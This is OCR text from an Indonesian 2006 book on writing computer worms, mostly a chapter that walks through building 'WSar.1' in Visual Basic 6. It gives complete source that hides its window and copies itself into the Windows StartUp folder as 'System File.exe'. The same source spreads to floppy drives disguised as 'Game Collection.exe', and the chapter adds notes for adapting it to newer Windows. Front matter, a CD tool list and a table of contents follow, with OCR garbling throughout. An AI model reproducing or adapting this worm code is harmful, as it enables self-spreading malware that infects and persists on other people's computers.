real yang digunakan para worm writer dalam membuat suatu
worm, karena akan mengingatkan pembaca semua, bahwa
worm adalah program yang sangat berbahaya dan dapat
dibuat dengan mudah.
101
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

7
.

W
o
r
m

W
S
a
r
.
1
B
anyak jalan menuju Roma, mungkin ungkapan ini tidak berlaku
pada proses hacking saja tetapi juga sangat cocok apabila ungka-
pan ini digunakan dalam proses pembuatan suatu worm.
Sudah menjadi suatu rahasia umum dimana para worm writer selalu
mencari vulnerability baru karena vulnerability lama kebanyakan su-
dah memiliki patch untuk memperbaiki celah tersebut, baik dari vendor
antivirus maupun dari vendor aplikasi atau sistem operasi itu sendiri.
Teknik yang dibuatpun menjadi beragam, penulis sendiri menemukan
beberapa trik yang akan dipaparkan pada bab ini.
Sebagai persiapan awal untuk membuat suatu worm, virus atau
malcode lain, ada beberapa ketentuan yang harus diperhatikan:
1. Jika memungkinkan, sangat disarankan untuk menggunakan kom-
puter tersendiri yang khusus digunakan untuk keperluan ini, dan
tidak digunakan oleh banyak orang
2. Gunakan program pembantu seperti Shad-
owUser atau DeepFreeze,. Program ini akan
membatalkan setiap perubahan yang dilaku-
kan bahkan perubahan yang terjadi pada
boot sector, sehingga walaupun partisi pada
harddisk tak sengaja terformat oleh worm,
hanya dengan me-restart komputer maka
segalanya akan kembali seperti semula.
Program ini hanya mengembalikan perubahan pada saat komputer
di restart, jadi jika ternyata perlu me-restart komputer untuk melihat
efek perubahan dari suatu worm, maka cukup dengan melakukan
Log Off dan kemudian Log In kembali, karena proses ini akan men-
imbulkan efek yang sama dengan restart komputer.
Untuk program DeepFreeze disarankan agar membuat partisi lebih
dari satu, misalnya dengan membuat dua partisi dimana partisi
C: sebagai drive System Windows dan partisi D: sebagai drive data,
kemudian instalkan DeepFreeze hanya pada drive C: saja sehingga
data source code yang tersimpan pada drive D: tidak terganggu oleh
DeepFreeze. Sementara untuk program ShadowUser lebih fexibel.
Anda tinggal menentukan folder apa saja yang ingin dibebaskan
dari proteksi
105
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

7
.

W
o
r
m

W
S
a
r
.
1
3. Gunakan program pembantu seperti
Virtual PC atau VMWare,. Program ini
akan mensimulasikan suatu komputer
maya sekaligus dengan jaringannya.
Kita dapat membuat suatu lab komputer
dengan sistem operasi yang berbeda
sekaligus.
Keuntungan lain ternyata kita bisa
membuat clonning dari suatu komputer
virtual, sehingga apabila system suatu komputer virtual sudah
tidak bisa diselamatkan lagi, kita dapat mengganti baru dengan
backup clonning yang sudah kita siapkan. Lagi pula kita tidak perlu
berpindah-pindah tempat untuk mengoperasikannya.
Penulis juga menyarankan agar menggunakan aplikasi Visual Basic 6.0
Enterprise, karena untuk versi lain seperti Visual Basic 6.0 Learning
Edition penulis menemukan batasan-batasan dan ada fasilitas yang
tidak bisa digunakan.
I.1 N08H 0â8â8 1
Suatu worm dasar dapat dipandang sebagai satu set instruksi berisi
sedikitnya tiga sub-rutin yang terpasang.
• Sub-rutin yang pertama berfungsi untuk melakukan penularan
dengan cara membuat clonning (salinan) dirinya sendiri pada
suatu system komputer, media penyimpanan atau melalui suatu
jaringan.
• Sub-rutin yang kedua berfungsi sebagai live defender (rutin untuk
bertahan hidup), yang akan memastikan suatu worm tetap eksis
pada suatu host system
• Sub-rutin yang ketiga berfungsi sebagai pengatur payload (muatan
maksud tertentu) yang mendikte suatu tindakan untuk dieksekusi.
Payload ini pada teorinya bisa berupa apa saja seperti menghapus
data, memasang backdoor atau memformat harddisk. Sub-rutin
pelengkap lainnya bisa saja sebagai penentu kapan payload tersebut
dilakukan.
108
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

7
.

W
o
r
m

W
S
a
r
.
1
I..t â|008|¡Hâ
Worm ini bernama WSar.1 (worm dasar 1) yang menggunakan icon
dengan gambar sebuah folder dan nama yang unik agar menarik minat
user untuk mengeksekusinya, merupakan worm yang sangat sederhana
sekali, sehingga hanya dapat menginfeksi sistem operasi Windows 9x
dan ME yang terinstal secara default pada drive C. WSar.1 memiliki
rutin-rutin yang akan melakukan tindakan sebagai berikut:
1. Melakukan pemeriksaan terhadap eksistensi worm itu sendiri pada
system komputer
2. Jika worm tidak mendapatkan eksistensinya maka worm akan
melakukan reproduksi dengan menciptakan salinan dirinya pada
direktori StartUp pada Startmenu
3. Setiap 1 menit berusaha untuk membuat salinan worm ke disket
pada drive A
4. Setiap tanggal 13 bulan Oktober akan menampilkan pesan "WSar.1
Ada Pada Komputer Anda" dan menghentikan segala aktiftas
worm pada hari tersebut.
I.8 P|H8008âHâN
Buka aplikasi Visual Basic.
Pada kotak dialog New
Project klik icon Standard
EXE pada tab New dan klik
Open, untuk menampilkan
kotak dialog New Project
bisa dengan klik File pada
menubar kemudian pilih
New Project.
10I
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

7
.

W
o
r
m

W
S
a
r
.
1
Visual basic
secara otomatis
member i kan
sebuah project
dengan nama
default Project1
dan sebuah
form di dalam-
nya dengan
nama default
Form1.
Sebagai langkah pertama, aturlah
Project Properties dengan mengklik
kanan nama project pada jendela
Project Explorer yang dalam hal
ini nama project masih bernama
Project1, kemudian klik 'Project1
Properties…’
108
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

7
.

W
o
r
m

W
S
a
r
.
1
Akan tampil kotak dialog Project Properties dan berada pada tab
General.
Ganti Project Name dari
nama Project1 menjadi
nama worm yaitu: WSar.
Dalam pengisian Project
Name, tidak boleh meng-
gunakan spasi, tanda
titik, tanda koma atau
karakter spesial lainnya.
Untuk melanjutkan pin-
dah ke menu Make den-
gan mengklik tab Make.
Ganti Application Title dari nama Project1 menjadi nama worm yaitu:
WSar.1 kemudian hapus value untuk setiap Type pada frame Version
Information, terutama untuk Type Company Name.
Tentunya Anda tidak
ingin nama perusahaan
tempat Anda bekerja
menjadi terkenal oleh
worm ini bukan  ?
Jika value yang dihapus
ternyata kembali saat
project di-load Anda
bisa menghapusnya
lagi dan menambahkan
sebuah karakter spasi.
Kemudian pindah ke
menu Compile dengan
mengklik tab Compile.
108
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

7
.

W
o
r
m

W
S
a
r
.
1
Pilih opsi Compile to
P-Code. Opsi ini akan
membuat program yang
dihasilkan berukuran
lebih kecil daripada meng-
gunakan opsi Compile
to Native Code. Akhiri
dengan menekan tombol
OK.
Langkah kedua adalah mengatur
properties pada form, dengan
mengklik nama form pada jendela
Project Explorer.
Dalam hal ini, nama form masih
bernama Form1, secara otomatis
segala properti pada Form1 akan
ditampilkan pada jendela Proper-
ties. Anda juga bisa meng-klik
ComboBox pada jendela Properties
dan pilih object Form1.
110
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

7
.

W
o
r
m

W
S
a
r
.
1
Kemudian atur jenis properti berikut ini pada Form1:
Jenis Nilai Keterangan
Name frmWSar1 Mengatur nama form menjadi frmWSar1
Icon (Icon) Pilih icon yang akan digunakan pada
form, WSar.1 menggunakan icon folder.
ico
ShowInTaskbar False Tidak menampilkan form pada taskbar
Visible False Tidak menampilkan form pada layar.
Langkah ketiga adalah menambahkan object Timer pada form yang
bertujuan untuk melakukan perulangan terhadap instruksi tertentu
tanpa memerlukan suatu interaksi oleh user.
Untuk itu klik ganda object Timer pada toolbox yang akan membuat
sebuah object Timer dengan nama default Timer1, kemudian atur jenis
properti berikut ini pada Timer1:
Jenis Nilai Keterangan
Name tmrWSar Mengatur nama Timer menjadi tmrWSar
Enable True Pastikan Timer akan aktif saat form di-load
Interval 60000 Setiap instruksi pada procedure Timer akan
dieksekusi setiap 1 menit
Langkah keempat adalah mengetikan kode program worm. Untuk itu
klik ganda bidang form hingga jendela Code Editor tampil dengan
langsung membuat
suatu sub 'Form Load’.
Anda juga bisa meng-
klik nama form pada
jendela Explorer, klik
tombol View Code
kemudian klik Com-
boBox Object pada
Code Editor dan pilih
Form, klik ComboBox
Event dan pilih Load.
111
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

7
.

W
o
r
m

W
S
a
r
.
1
Ketik kode program berikut ini:
'WSar.1 by Achmad Darmal
'Tarakan, Kalimantan Timur - Indonesia
Option Explicit On
Private Sub Form_Load()
On Error Resume Next
If App.PrevInstance = True Then End
If Len(Dir$("C:\WINDOWS\Start Menu\Programs\StartUp\Syst" & _
"em File.exe")) = 0 Then
FileCopy(WormFile, "C:\WINDOWS\Start Menu\Programs\Star" & _
"tUp\System File.exe")
End If
If App.Path = "A:\" Or App.Path = "B:\" Then
Unload(Me)
End If
End Sub
Private Sub tmrWSar_Timer()
On Error Resume Next
If Len(Dir$("A:\Game Collection.exe")) = 0 Then
FileCopy(WormFile, "A:\Game Collection.exe")
End If
If Day(Now) = 13 And Month(Now) = 10 Then
MsgBox("WSar.1 Ada Pada Komputer Anda")
Unload(Me)
End If
End Sub
Private Function WormFile()
Dim WPath, WName As String
WPath = App.Path
If Right(WPath, 1) <> "\" Then
WPath = WPath & "\"
End If
WName = App.EXEName & ".exe"
WormFile = WPath & WName
End Function
11t
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

7
.

W
o
r
m

W
S
a
r
.
1
Berikut penjelasan tentang kode program:
'WSar.1 by Achmad Darmal
'Tarakan, Kalimantan Timur – Indonesia
Option Explicit
Dua baris teratas adalah baris komentar, diawali dengan single quote.
Biasanya digunakan untuk memberi keterangan tentang program atau
apapun yang ingin programmer sampaikan kepada pengguna kode
tersebut. Statement Option Explicit pada baris ketiga memastikan agar
seluruh variabel dideklarasikan.
Private Sub Form_Load()
Baris ini menandakan awal dari sebuah procedure, dalam hal ini
adalah procedure yang akan dikerjakan pada event Form_Load, suatu
kejadian saat form diaktifkan untuk pertama kali atau sesaat sebelum
ditampilkan.
On Error Resume Next
Statement ini akan sangat berguna apabila terjadi suatu kesalahan,
karena program akan mengacuhkan kesalahan tersebut dan kemudian
mengakses instruksi setelahnya.
If App.PrevInstance = True Then End
Jika fle aplikasi yang sama sudah berjalan maka akhiri proses pengek-
sekusian fle tersebut. Statement ini berguna untuk mencegah suatu fle
aplikasi yang sama dieksekusi lebih dari satu kali.
If Len(Dir$("C:\WINDOWS\Start Menu\Programs\Star" & _
"tUp\System File.exe")) = 0 Then
Jika banyak karakter dalam pencarian "C:\WINDOWS\Start Menu\
Programs\StartUp\System File.exe" adalah 0 (nol) maka fle tersebut
tidak ditemukan (sebaliknya akan menghasilkan nilai 15 jika fle terse-
but ditemukan. Nilai 15 berasal dari jumlah karakter pada nama fle),
maka…
118
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

7
.

W
o
r
m

W
S
a
r
.
1
FileCopy WormFile, "C:\WINDOWS\Start Menu\Prog" & _
"rams\StartUp\System File.exe"
FileCopy adalah function untuk membuat salinan suatu fle. WormFile
mewakili nama main fle (fle utama) yang terproses. WormFile adalah
suatu function untuk mendapatkan full path (alamat penuh) fle utama,
Sedangkan "C:\WINDOWS\StartMenu\Programs\StartUp\System
File.ex e" adalah lokasi dan nama fle untuk tujuan penyalinan fle,
If App.Path = "A:\" Or App.Path = "B:\" Then
Unload Me
End If
Jika path fle utama pada drive A atau pada drive B maka akhiri aplikasi.
Statement ini bertujuan untuk mencegah fle worm yang berada pada
disket bertahan di memory. Hal ini sebaiknya juga dilakukan untuk
setiap removable disk, seperti disket dan usb disk. Akhirnya, End If
digunakan untuk menutup statement If sebelumnya.
End Sub
Statement End Sub berfungsi untuk mengakhiri procedure
Form_Load.
Private Sub tmrWSar_Timer()
On Error Resume Next
If Len(Dir$("A:\Game Collection.exe")) = 0 Then
FileCopy(WormFile, "A:\Game Collection.exe")
End If
If Day(Now) = 13 And Month(Now) = 10 Then
MsgBox("WSar.1 Ada Pada Komputer Anda")
Unload(Me)
End If
End Sub
Memulai suatu procedure baru terhadap object tmrWSar (Timer), men-
gacuhkan error apabila terjadi dan mengeksekusi instruksi setelahnya.
Jika fle "A:\Game Collection.exe" tidak ditemukan maka meng-copy
fle utama ke drive A dengan nama "Game Collection.exe".
Jika tanggal sekarang adalah 13 dan bulan sekarang adalah 10 (Okto-
111
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

7
.

W
o
r
m

W
S
a
r
.
1
ber) maka tampilkan pesan "WSar.1 Ada Pada Komputer Anda" serta
bersihkan worm dari memory, sehingga untuk hari tersebut worm
tidak akan melakukan aktiftas apapun.
Private Function WormFile()
Dim WPath, WName As String
WPath = App.Path
If Right(WPath, 1) <> "\" Then
WPath = WPath & "\"
End If
WName = App.EXEName & ".exe"
WormFile = WPath & WName
End Function
Function WormFile dibuat untuk mendapatkan path penuh fle utama,
dimulai dengan pendeklarasian WPath untuk lokasi dan WName
untuk nama fle, kemudian menentukan lokasi fle utama dengan func-
tion App.Path dan menyimpannya dalam variabel WPath..
Jika satu karakter disebelah kanan nilai variabel WPath tidak sama
dengan "\" maka nilai variabel WPath ditambahkan karakter "\" di-
belakangnya, kemudian mengatur nilai variabel WName dengan nilai
berupa nama fle utama yang didapat dari function App.EXEName.
Karena nama fle yang didapatkan dari function ini belum memiliki
ekstensi, maka ditambahkan string ".exe" dibelakangnya, menandakan
fle tersebut adalah fle executable.
Langkah kelima adalah meny-
impan project yang telah sele-
sai dibuat, dengan meng-click
File pada menubar kemudian
pilih Save Project.
115
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

7
.

W
o
r
m

W
S
a
r
.
1
Kemudian akan tampil
kotak dialog Save File
As, yang berfungsi
untuk menyimpan form,
module dan sebagainya
yang akan disimpan.
Tentukan suatu folder
atau buat folder baru
dengan mengklik tombol
New Folder.
Berikutnya akan tampil kotak
dialog Save Project As, yang
berfungsi untuk menyimpan
project secara keseluruhan.
Langkah terakhir
adalah mengkom-
pilasi project
menjadi suatu fle
executable. Untuk
itu klik File pada
menubar, kemu-
dian dalam hal ini
klik Make WSar.
Exe yang akan
me n a mp i l k a n
kotak dialog Make
Project,
118
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored
B
a
b

7
.

W
o
r
m

W
S
a
r
.
1
Isi TextBox File name dengan nama File Exe yang akan dibuat yang
dalam contoh ini bernama WSar.exe. Pilih direktori tempat fle tersebut
akan diletakkan. Klik OK untuk memulai proses kompilasi.
Catatan untuk WSar.1 : untuk lokasi direktori StartUp pada Windows
2000 dan XP secara default adalah sebagai berikut:
1. C:\Documents and Settings\Administrator\Start Menu\ Pro-
grams\startup
2. C:\Documents and Settings\All Users\Start Menu\Progra ms\
startup
3. C:\Documents and Settings\Default User\Start Menu\ Programs\
startup

Computer Worm 1 - Secret of Underground Coding
Hak Cipta © 2006 pada penulis

Hak Cipta dilindungi Undang-Undang. Dilarang memperbanyak atau memindahkan sebagian atau seluruh isi buku ini dalam bentuk apapun, baik secara elektronis maupun mekanis, termasuk memfotocopy, merekam atau dengan sistem penyimpanan lainnya, tanpa izin tertulis dari Penulis dan Penerbit.

ISBN 979-1090-01-7

Cetakan pertama

: Juli 2006

Publisher Jasakom Web Site http://www.jasakom.com/penerbitan Email admin@jasakom.com

Address PO BOX 6179 JKB

Ketentuan pidana pasal 72 UU No. 19 tahun 2002
1. Barang siapa dengan sengaja dan tanpa hak melakukan kegiatan sebagaimana dimaksud dalam pasal 2 ayat (1) atau pasal 49 ayat (1) dan ayat (2) dipidana dengan pidana penjara paling singkat 1 (satu) bulan dan/atau denda paling sedikit Rp. 1.000.000 (satu juta rupiah) atau pidana penjara paling lama 7 (tujuh) tahun dan/ atau denda paling banyak Rp. 5.000.000.000.00 (lima miliar rupiah). 2. Barang siapa dengan sengaja menyiarkan, memamerkan, mengedarkan, atau menjual kepada umum suatu Ciptaan atau barang hasil pelanggaran Hak Cipta atau Hak Terkait sebagaimana dimaksud pada ayat (1), dipidana dengan pidana penjara paling lama 5 (lima) tahun dan/atau denda paling banyak Rp. 500.000.000,00 (lima ratus juta rupiah)

Computer Worm 1
Secret of Underground Coding

ISI CD PENDUKUNG
Buku ini disertai dengan sebuah CD pendukung yang berisi film tutorial sehingga pembaca bukan saja hanya membaca buku tetapi juga bisa melihat langsung teknik pembuatan suatu worm komputer, kemudian kumpulan source code / listing code yang digunakan pada buku dan beberapa program pendukung sebagai berikut:

DEMOWARE
VM Ware Virtual PC DeepFreeze ShadowUser ASPack UltraEdit 55.9 MB 17.1 MB 2.06 MB 7.80 MB 297 KB 1.69 MB

FREEWARE
A Squared HijackFree CXUPX Darmal’s Packer DOS 7.10 DropFile Script Generator HHD Hex Editor Icon Sucker Std KillBox Petite Process Explorer Registrar Lite Resource Hacker UPX 1.25 UPX Mutanter UPX Scrambler UPX Windows GUI 497 KB 419 KB 730 KB 765 KB 21.5 KB 2.07 MB 658 KB 67,5 KB 117 KB 1.24 MB 2.28 MB 1.32 MB 163 KB 38.9 KB 17.5 KB 199 KB

Puji syukur ke hadirat Allah SWT, atas berkat dan rahmat-Nya pula sehingga penulis dapat menyelesaikan penulisan buku: Computer Worm ini dengan baik. Hingga buku ini selesai ditulis, penulis belum mendapatkan adanya buku yang khusus membahas mengenai worm komputer baik dengan mengunjungi ke toko-toko buku secara langsung maupun berkunjung secara online. Sedangkan hal ini sangat penting sekali, terlebih pada saat buku ini disusun dimana perkembangan dan tingkat penyebaran worm lokal di Indonesia sangat tinggi dan cenderung semakin mengganas. Ironisnya banyak sekali pengguna komputer yang tidak mengerti perbedaan antara worm dan virus, sehingga worm seringkali diasumsikan sebagai suatu virus komputer dan banyak pula yang berasumsi bahwa worm merupakan suatu sub-class dari virus komputer, memang suatu kesalahan umum sehingga penulispun terkadang menggunakan istilah ini , lagipula penulis tidak berminat menjelaskan arti worm komputer (yang akan berbuntut dengan penjelasan panjang lebar tentang perbedaannya dengan virus komputer) setiap kali penulis menyebutkan istilah worm komputer , penulis berpendapat momen inilah yang paling tepat untuk menjelaskannya kepada pembaca semua. Buku ini bertujuan untuk menjelaskan kepada para pembaca, apa sesungguhnya worm komputer itu, apa perbedaanya dengan virus komputer, dan bagaimana worm tersebut diprogram. Buku ini tidak hanya membahas tentang worm komputer saja, tetapi juga memuat beberapa materi standar yang harus diketahui dalam rangka membuat atau memerangi suatu worm komputer. Penulis berharap buku ini dapat menambah pengetahuan bagi penggemar TI, system administrator atau siapa saja yang selalu menggunakan komputer, dan bukan untuk mengajari hal-hal negatif kepada para pemula, tapi seba- 

Jasakom

Computer Worm 1 - Secret of Underground Coding

KATA PENGANTAR

special thank’s buat S’to yang sudah banyak membantu dalam proses pembentukan buku. dan alumni POLNES angkatan 98 – 2001. Akhir kata penulis penulis menyadari adanya kekurangan-kekurangan pada buku ini. worm atau malcode lainnya. mengerti dan menguasai teknik pembuatan suatu virus. selain itu penulis tidak bertanggung jawab apabila ada penyalahgunaan atas informasi. Dalam kesempatan ini. seluruh dosen POLNES (Politeknik Negeri Samarinda) khususnya untuk Bapak Ruslan Ardi dan Bapak Arkas Viddy. penulis membuat agar e-mail dengan subjek lain akan segera dihapus secara otomatis). Tidak lupa pula penulis mengucapkan terima kasih kepada penerbit Jasakom yang berkenan menerbitkan buku ini. sesungguhnya sudah tidak dibutuhkan tutorial lain untuk memeranginya.Secret of Underground Coding "Dengan mengetahui. salam juga untuk teman-teman di AMIK PPKIA Tarakan. penulis mengucapkan terima kasih kepada kedua orang tua penulis. penulis mengharapkan kritik dan saran yang bersifat membangun. Membahas pembuatan suatu worm memerlukan pengertian akan tanggung jawab moral yang besar. untuk itu silahkan kirim e-mail Anda ke alamat e-mail penulis di: achmad_darmal@ yahoo. kemudian salam penulis untuk alumni SMK Negeri 1 Tarakan angkatan 95 – 98.sg.liknya memberi kesadaran kepada mereka yang senantiasa melakukan hal-hal negatif untuk menghentikan tindakan negatif tersebut." Jasakom i .com. karena worm komputer dapat menimbulkan dampak yang sangat fatal dan merugikan maka penulis sangat mengharapkan kebaikan moral para pembaca. maka dengan tidak merendahkan diri. Computer Worm 1 . dengan subjek: worm komputer (untuk menghindari spam mail. lebih baik lagi apabila mereka juga memberi kontribusi untuk menghentikan perkembangan worm komputer dan malcode lainnya di bumi pertiwi ini. script atau program-program yang disertakan bersama buku ini.

3 KEMAMPUAN MENYEMBUNYIKAN DIRI 2.1 PROPAGATION PHASE ( FASE PENYEBARAN ) 2.5.2 MORRIS 2.3.5 PRETTY PARK 2.4 MELISA 2.5.3.4.4 EXECUTION PHASE ( FASE EKSEKUSI ) 2.3 TRIGERRING PHASE ( FASE AKTIF ) 2.8 LOVE LETTER 2.4.5.2 KEMAMPUAN REKAYASA SOSIAL 2.9 HYBRIS v 1 5 6 8 9 9 9 10 10 10 11 11 11 11 11 12 12 12 13 13 14 14 15 16 16 ii Jasakom Computer Worm 1 .4.3.2 DORMANT PHASE ( FASE ISTIRAHAT/TIDUR ) 2.5.1 CHRISTMA EXEC 2.4.5 PERKEMBANGAN WORM NON LOKAL 2.5.5 KEMAMPUAN MENGADAKAN MANIPULASI 2.1 ASAL MULA WORM KOMPUTER 2.5.5.5.4 KEMAMPUAN MENDAPATKAN INFORMASI 2.7 BUBBLE BOY 2.3 KEMAMPUAN DASAR WORM 2.6 EXPLORE ZIP 2.3 HAPPY99 2.KATA PENGANTAR BAB 1 PENDAHULUAN BAB 2 MENGENAL WORM 2.5.3.Secret of Underground Coding Daftar Isi .3.1 KEMAMPUAN REPRODUKSI DAN DISTRIBUSI 2.2 PERBEDAAN WORM DAN VIRUS 2.4 SIKLUS HIDUP WORM 2.

6.13 NIMDA 2.6.5.14 BADTRANS.14 LIGHTMOON 17 17 17 18 19 20 21 21 22 22 22 23 23 24 24 25 25 25 26 26 27 27 28 28 BAB 3 REGISTRY WINDOWS 3.6.6 PERKEMBANGAN WORM LOKAL 2.5.4 KANGEN 2.Computer Worm 1 .6.6.11 ROMDIL 2.6.6.3 TABARU 2.16 SLAMMER 2.5.6.2 REGISTRY EDITOR (REGEDIT) 3.2.1 STRUKTUR REGISTRY 3.2 VALUE 3.2.5.6.2 LINGKUNGAN KERJA REGISTRY EDITOR 29 30 31 31 32 32 33 Jasakom iii .10 BLUEFANTASY 2.17 BAGLE 2.5.B 2.6.18 NETSKY 2.1 MEMBUKA APLIKASI REGISTRY EDITOR 3.5 KUMIS 2.5.Secret of Underground Coding 2.2 PESIN 2.6 DECOIL 2.5.7 RONTOKBRO 2.6.AQF 2.12 MYBRO 2.6.1 I-WORM PERKASA 2.1 HIVE 3.13 IRCBOT.6.10 ANNA KOURNIKOVA 2.1.9 RUNITIS 2.6.8 NOBRON 2.5.5.1.12 CODE RED 2.15 KLEZ 2.11 SADMIND 2.

4 PENCARIAN TEKS PADA KEY.3 SETTING PROPERTIES 4.3.2.2 MENYISIPKAN CONTROL 4.4 MENGETIK KODE PROGRAM 4.2.1 LINGKUNGAN KERJA VISUAL BASIC 4.3.5 FORM LAYOUT WINDOW 4.1.6 MEMANFAATKAN FILE REG 34 35 35 37 38 39 BAB 4 MENGENAL VISUAL BASIC 6.3.4 PROPERTIES WINDOWS 4.2 PEMBUATAN APLIKASI 4.2.3.2 LABEL 5.2 KONTROL 5.2.3 OPERASI DASAR REGISTRY EDITOR 33 .3 MANIPULASI KEY & VALUE 3.1 MEMBUAT PROYEK 4.2.2 TOOLBAR 4.2 EXPORT & IMPORT DATA REGISTRY 3.1.3 TEXTBOX 51 53 54 55 56 57 ix Jasakom Computer Worm 1 .2.1 PICTUREBOX 5.5 MENGGUNAKAN PERINTAH BARIS (COMMAND LINE) 3.2.3 PROJECT EXPLORER 4.0 4.1.1 FORM 5. VALUE ATAU DATA 3.3.1 BACKUP & RESTORE REGISTRY 3.5 MENYIMPAN PROGRAM 4.2.1.Secret of Underground Coding 3.7 KOMPILASI PROGRAM MENJADI EXE 41 42 43 43 43 44 44 44 45 45 46 46 47 47 47 48 48 49 BAB 5 OBJECT FORM DAN CONTROL 5.1.3.6 TOOLBOX 4.1.8 CODE WINDOW 4.2.2.3.6 MENJALANKAN PROGRAM 4.1.1.1 MENUBAR 4.7 FORM WINDOW 4.

17 LINE 5.4.11 VSCROLLBAR 5.2.8 COMBOBOX 5.4 PERCABANGAN (BRANCHING) 6.3.19 DATA 5.4.2.18 IMAGE 5.2 OPERATOR ARITMATIKA 6.1.3 PERCABANGAN GOSUB/RETURN 6.2 PERCABANGAN SELECT CASE 6.2.10 HSCROLLBAR 5.3.2.2.2.2.16 SHAPE 5.2.4 OPERATOR LOGIKA 6.1 VARIABEL 6.14 DIRLISTBOX 5.2.1 OPERATOR PENUGASAN (ASSIGNMENT) 6.1.4.6 CHECKBOX 5.15 FILELISTBOX 5.2.3 OPERATOR KOMPARASI 6.4 FRAME 5.13 DRIVELISTBOX 5.3 OPERATOR 6.2.3.2.1 PERCABANGAN IF/THEN/ELSE 6.2 STATEMENTS AND EXPRESSIONS 6.2.3.4.7 OPTIONBUTTON 5.5 PERCABANGAN ON ERROR 73 74 75 76 77 78 78 78 79 80 81 81 82 83 83 84 Jasakom .12 TIMER 5.1 IMPLICIT 6.Computer Worm 1 .Secret of Underground Coding x 5.5 COMMANDBUTTON 5.4.9 LISTBOX 5.2 EXPLICIT 6.20 OLE 58 58 59 60 61 62 63 64 65 66 66 67 68 69 69 70 71 BAB 6 KODE PROGRAM 6.2.2.4 PERCABANGAN GOTO 6.2.2.

5.7 ARRAY 6.7.5.5.8.5 MENGETAHUI BESAR FILE 6.8.9.1 MENGUBAH NAMA DAN MEMINDAH FILE 6.8.6 PENGHENTIAN (TERMINATING) 6.9.6.8.4 MELIHAT DAN MENGUBAH ATRIBUT PADA FILE 6.Secret of Underground Coding 6.7 MENGETAHUI DRIVE DAN DIREKTORI AKTIF 6.8.7.6.8.10 MEMBUAT DIREKTORI BARU 6.5 PENGULANGAN (LOOPING) 85 .8.11 FILE SYSTEM OBJECT (FSO) 85 85 85 86 86 87 87 87 88 88 88 89 90 90 91 91 92 93 94 94 95 95 96 96 97 97 97 98 99 99 100 101 xi Jasakom Computer Worm 1 .2 MEMBUAT SALINAN / MENG-COPY FILE 6.8.9 MENGATUR DIREKTORI AKTIF 6.2 DEKLARASI DENGAN KEYWORD TO 6.1 MEMBUAT FILE TEXT 6.1 DO WHILE/LOOP 6.8.11 MENGHAPUS DIREKTORI 6.8.8 MENGATUR DRIVE AKTIF 6.8 PENANGANAN FILE 6.3 DO/LOOP WHILE 6.6.2 MEMBACA FILE TEXT 6.5.10 OPERASI FILE BINARY 6.2 EXIT 6.2 MEMBACA FILE BINARY 6.3 STOP 6.6 MENGETAHUI TANGGAL DAN WAKTU FILE 6.1 END 6.1 DEKLARASI DENGAN VARIABEL TUNGGAL 6.8.5 FOR/NEXT 6.3 MENGHAPUS FILE 6.4 DO/LOOP UNTIL 6.6.10.2 DO UNTIL/LOOP 6.10.12 MENGUBAH NAMA DIREKTORI 6.1 MEMBUAT FILE BINARY 6.5.9 OPERASI FILE TEXT 6.8.

2 PEMROGRAMAN 165 166 166 BAB 13 WORM WSar.Computer Worm 1 .3 9.2 PEMROGRAMAN 117 117 118 BAB 9 WORM WSar.2 8.1 ALGORITMA 10.1 ALGORITMA 9.4 10.2 PEMROGRAMAN 135 135 136 BAB 11 WORM WSar.2 ALGORITMA 13..3 PEMROGRAMAN 103 105 106 106 BAB 8 WORM WSar.1 ALGORITMA 12.2 PEMROGRAMAN 125 125 126 BAB 10 WORM WSar.2 PEMROGRAMAN 151 152 153 BAB 12 WORM WSar.7 13.5 11.3 PEMROGRAMAN 179 180 191 191 Jasakom xii .1 COMPARISON METHODE 13.1 ALGORITMA 11.2 ALGORITMA 7.Secret of Underground Coding BAB 7 WORM WSar.6 12.1 7.1 ALGORITMA 8.1 WORM DASAR 1 7.

8 207 .14.3 POLYMORPHIC METHODE 14.9 15.1 WATCHER METHODE 14.1 DROP FILE METHODE 15.4 ALGORITMA 14.2 ALGORITMA 15.3 PEMROGRAMAN 243 244 250 251 xiii Jasakom Computer Worm 1 .5 PEMROGRAMAN 208 209 212 214 215 BAB 15 WORM WSar.Secret of Underground Coding BAB 14 WORM WSar.2 ENCRYPTION METHODE 14.

.

pada tahun 2003 pengguna komputer di Indonesia disibukkan oleh sebuah worm lokal yang diperkirakan berhasil menginfeksi ribuan komputer di Indonesia. Maraknya penyebaran virus.Computer Worm 1 . Pendahuluan BAB 1 PENDAHULUAN . Di Indonesia sendiri worm lokal mulai menunjukan aktifitas yang cukup signifikan di awal era millenium. mulai dari ancaman langsung para cracker atau hacker jahat hingga ancaman yang dilakukan melalui suatu program yang disebut malcode (malicious code).Secret of Undeground Coding : Uncensored S eiring dengan pesatnya kemajuan teknologi informasi khususnya dibidang teknologi komputer dan jaringan. ternyata semakin memberikan semangat bagi para pembuat worm lokal untuk terus berkarya. Suatu program atau script apapun yang bersifat merusak atau merugikan dapat dikategorikan sebagai malcode termasuk virus komputer. 1 Jasakom Bab 1. keamanan menjadi isu yang kerap kali dibahas. worm atau trojan horse. worm atau trojan horse.

